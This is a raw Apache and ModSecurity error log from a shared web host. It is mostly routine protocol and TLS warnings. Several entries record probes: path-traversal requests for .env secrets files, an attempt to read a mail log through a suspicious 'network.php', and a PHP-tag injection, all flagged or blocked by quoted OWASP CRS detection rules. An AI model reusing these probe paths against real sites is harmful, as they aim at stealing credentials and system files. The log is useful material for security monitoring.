[Mon May 11 23:50:43.700854 2026] [security2:error] [pid 1601130:tid 1601174] [client 162.62.231.139:35548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/feed/"] [unique_id "agJPM3EgAO_835W6c1mzqgAAAFg"]
[Mon May 11 23:50:48.396419 2026] [security2:error] [pid 1606352:tid 1606813] [client 5.181.131.117:50317] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJPOHo_DFxNSZVmaX3skQAAANg"], referer: https://www.piregwan-genesis.com/
[Mon May 11 23:50:51.394781 2026] [security2:error] [pid 1630927:tid 1630931] [client 43.163.85.226:59060] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/"] [unique_id "agJPO2iGYYhUwDaJINmqPAAAAUE"], referer: http://apoe.fr
[Mon May 11 23:50:56.292924 2026] [security2:error] [pid 1606352:tid 1606436] [client 43.153.19.83:41916] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/documents.html"] [unique_id "agJPQHo_DFxNSZVmaX3slwAAANE"], referer: http://apoe.fr/documents.html
[Mon May 11 23:51:02.739037 2026] [ssl:error] [pid 1605480:tid 1605533] (EAI 2)Name or service not known: [client 167.94.146.60:54436] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:51:02.739524 2026] [ssl:error] [pid 1605480:tid 1605533] AH01941: stapling_renew_response: responder error
[Mon May 11 23:51:03.964186 2026] [ssl:error] [pid 1590352:tid 1590411] (EAI 2)Name or service not known: [client 167.94.146.60:54470] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:51:03.964397 2026] [ssl:error] [pid 1590352:tid 1590411] AH01941: stapling_renew_response: responder error
[Mon May 11 23:51:07.934966 2026] [ssl:error] [pid 1590352:tid 1590413] (EAI 2)Name or service not known: [client 167.94.146.60:27088] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:51:07.935092 2026] [ssl:error] [pid 1590352:tid 1590413] AH01941: stapling_renew_response: responder error
[Mon May 11 23:51:08.587998 2026] [ssl:error] [pid 1601130:tid 1601169] (EAI 2)Name or service not known: [client 167.94.146.60:27090] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:51:08.588183 2026] [ssl:error] [pid 1601130:tid 1601169] AH01941: stapling_renew_response: responder error
[Mon May 11 23:51:10.144779 2026] [ssl:error] [pid 1630927:tid 1630939] (EAI 2)Name or service not known: [client 167.94.146.60:27116] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:51:10.145001 2026] [ssl:error] [pid 1630927:tid 1630939] AH01941: stapling_renew_response: responder error
[Mon May 11 23:51:37.368324 2026] [security2:error] [pid 1601130:tid 1601152] [client 43.166.244.251:60012] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/hirondelle/"] [unique_id "agJPaXEgAO_835W6c1mz8QAAAEI"]
[Mon May 11 23:52:21.439852 2026] [security2:error] [pid 1630927:tid 1630942] [client 43.166.240.231:54982] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJPlWiGYYhUwDaJINmqlQAAAUw"]
[Mon May 11 23:52:58.949023 2026] [authz_core:error] [pid 1590352:tid 1590406] [client 47.128.28.151:32088] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/rest-api/endpoints/error_log
[Mon May 11 23:53:05.215327 2026] [security2:error] [pid 1601130:tid 1601152] [client 43.158.91.71:53422] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2018/08/les-youngtimers-1980a2000-le"] [unique_id "agJPwXEgAO_835W6c1m0zQAAAEI"]
[Mon May 11 23:53:07.973240 2026] [:error] [pid 1605480:tid 1605533] [client 95.215.0.144:36930] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:53:08.137436 2026] [:error] [pid 1630927:tid 1630941] [client 95.215.0.144:35960] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:53:08.151800 2026] [:error] [pid 1590352:tid 1590397] [client 46.161.50.108:55510] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:53:08.261939 2026] [:error] [pid 1606352:tid 1606441] [client 46.161.50.108:55526] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:53:08.473437 2026] [:error] [pid 1605480:tid 1605523] [client 46.161.50.108:55540] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:53:08.579371 2026] [:error] [pid 1588898:tid 1588918] [client 46.161.50.108:55548] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:54:24.023813 2026] [security2:error] [pid 1601130:tid 1601163] [client 43.155.162.41:42870] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agJQEHEgAO_835W6c1m1IgAAAE0"]
[Mon May 11 23:54:32.172262 2026] [autoindex:error] [pid 1606352:tid 1606420] [client 199.45.155.86:50954] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:55:24.496838 2026] [security2:error] [pid 1590352:tid 1590403] [client 43.156.18.240:38954] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/ossature-bois/feed/"] [unique_id "agJQTK1q0G_aXAqWauQZiAAAAIs"]
[Mon May 11 23:55:27.979175 2026] [security2:error] [pid 1588898:tid 1588919] [client 129.226.146.134:34878] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/evaluation/"] [unique_id "agJQT6FW67LJTsgN3jQrlAAAABQ"]
[Mon May 11 23:55:48.625419 2026] [authz_core:error] [pid 1605480:tid 1605539] [client 8.217.212.64:60043] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log
[Mon May 11 23:55:52.254263 2026] [security2:error] [pid 1605480:tid 1605522] [client 43.156.114.184:36198] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-est-sur-instagram/"] [unique_id "agJQaB2Cvzd_nyNfUm8eegAAAQA"]
[Mon May 11 23:56:05.652239 2026] [ssl:error] [pid 1606352:tid 1606441] (EAI 2)Name or service not known: [client 44.250.160.40:56254] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:56:05.652466 2026] [ssl:error] [pid 1606352:tid 1606441] AH01941: stapling_renew_response: responder error
[Mon May 11 23:56:06.146500 2026] [ssl:error] [pid 1601130:tid 1601163] (EAI 2)Name or service not known: [client 44.250.160.40:56270] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:56:06.146550 2026] [ssl:error] [pid 1601130:tid 1601163] AH01941: stapling_renew_response: responder error
[Mon May 11 23:56:07.382544 2026] [ssl:error] [pid 1605480:tid 1605546] (EAI 2)Name or service not known: [client 44.250.160.40:56272] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:56:07.382596 2026] [ssl:error] [pid 1605480:tid 1605546] AH01941: stapling_renew_response: responder error
[Mon May 11 23:56:11.842882 2026] [authz_core:error] [pid 1605480:tid 1605539] [client 216.73.216.110:62361] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Laravel/error_log
[Mon May 11 23:56:32.262576 2026] [security2:error] [pid 1605480:tid 1605529] [client 43.155.140.157:50978] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/logiciel/rainmeter/ordinateur-a-hublot/"] [unique_id "agJQkB2Cvzd_nyNfUm8e3QAAAQc"]
[Mon May 11 23:56:37.639997 2026] [security2:error] [pid 1590352:tid 1590394] [client 216.73.216.110:27383] ModSecurity: Warning. Matched phrase "var/log/exim_mainlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_mainlog found within ARGS:filesrc: /var/log/exim_mainlog-20260419.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJQla1q0G_aXAqWauQZ2QAAAII"]
[Mon May 11 23:56:37.641392 2026] [security2:error] [pid 1590352:tid 1590394] [client 216.73.216.110:27383] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJQla1q0G_aXAqWauQZ2QAAAII"]
[Mon May 11 23:56:37.727946 2026] [security2:error] [pid 1590352:tid 1590394] [client 216.73.216.110:27383] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJQla1q0G_aXAqWauQZ2QAAAII"]
[Mon May 11 23:57:10.732414 2026] [security2:error] [pid 1588898:tid 1588912] [client 176.65.139.231:47530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "culturesvoile.com"] [uri "/app/.env"] [unique_id "agJQtqFW67LJTsgN3jQr-QAAAA0"]
[Mon May 11 23:57:10.732741 2026] [security2:error] [pid 1588898:tid 1588912] [client 176.65.139.231:47530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "culturesvoile.com"] [uri "/app/.env"] [unique_id "agJQtqFW67LJTsgN3jQr-QAAAA0"]
[Mon May 11 23:57:10.733246 2026] [security2:error] [pid 1588898:tid 1588912] [client 176.65.139.231:47530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "culturesvoile.com"] [uri "/app/.env"] [unique_id "agJQtqFW67LJTsgN3jQr-QAAAA0"]
[Mon May 11 23:57:13.855573 2026] [authz_core:error] [pid 1605480:tid 1605535] [client 17.246.23.246:60874] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sitemaps/providers/error_log
[Mon May 11 23:58:56.501811 2026] [security2:error] [pid 1630927:tid 1630937] [client 43.153.54.14:45134] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Darwich-extrait-2.mp3"] [unique_id "agJRIGiGYYhUwDaJINms-AAAAUc"]
[Mon May 11 23:59:29.462600 2026] [core:error] [pid 1590352:tid 1590414] [client 45.148.10.246:61078] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Mon May 11 23:59:29.495557 2026] [core:error] [pid 1590352:tid 1590405] [client 45.148.10.246:60944] AH10244: invalid URI path (/../.env)
[Mon May 11 23:59:29.855183 2026] [core:error] [pid 1605480:tid 1605530] [client 45.148.10.246:60912] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 23:59:30.397806 2026] [security2:error] [pid 1601130:tid 1601161] [client 23.22.105.143:57540] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>maia/questionnaire.php?formation. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>maia/questionnaire.php?formation: <?php echo $formationid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agJRQnEgAO_835W6c1m20gAAAEs"]
[Mon May 11 23:59:30.405088 2026] [security2:error] [pid 1601130:tid 1601161] [client 23.22.105.143:57540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agJRQnEgAO_835W6c1m20gAAAEs"]
[Mon May 11 23:59:30.502895 2026] [security2:error] [pid 1601130:tid 1601161] [client 23.22.105.143:57540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJRQnEgAO_835W6c1m20gAAAEs"]
[Mon May 11 23:59:31.107323 2026] [security2:error] [pid 1605480:tid 1605546] [client 43.164.197.117:37294] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agJRQx2Cvzd_nyNfUm8fsgAAARg"]
[Tue May 12 00:00:12.045634 2026] [security2:error] [pid 1590352:tid 1590403] [client 129.226.213.145:51882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/temoignages/"] [unique_id "agJRbK1q0G_aXAqWauQbJAAAAIs"]
[Tue May 12 00:00:17.975930 2026] [:error] [pid 1605480:tid 1605532] [client 138.204.24.7:15300] File does not exist: /home/ixinabou/public_html/xmlrpc.php
[Tue May 12 00:00:30.171324 2026] [security2:error] [pid 1630927:tid 1630941] [client 49.51.196.42:40426] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJRfmiGYYhUwDaJINmtdAAAAUs"]
[Tue May 12 00:01:31.784143 2026] [security2:error] [pid 1588898:tid 1588901] [client 43.133.66.51:57090] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJRu6FW67LJTsgN3jQtKAAAAAI"]
[Tue May 12 00:02:14.575329 2026] [ssl:error] [pid 1630927:tid 1630953] (EAI 2)Name or service not known: [client 18.202.32.83:48994] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:02:14.575796 2026] [ssl:error] [pid 1630927:tid 1630953] AH01941: stapling_renew_response: responder error
[Tue May 12 00:02:18.421781 2026] [:error] [pid 1630927:tid 1630944] [client 20.220.150.242:1040] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:02:40.414760 2026] [:error] [pid 1588898:tid 1588905] [client 157.245.237.145:59204] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:02:56.141044 2026] [security2:error] [pid 1590352:tid 1590399] [client 43.165.174.53:58162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJSEK1q0G_aXAqWauQcKwAAAIc"]
[Tue May 12 00:02:59.190289 2026] [:error] [pid 1590352:tid 1590397] [client 157.245.237.145:51984] File does not exist: /home/totalcloud/public_html/index.php
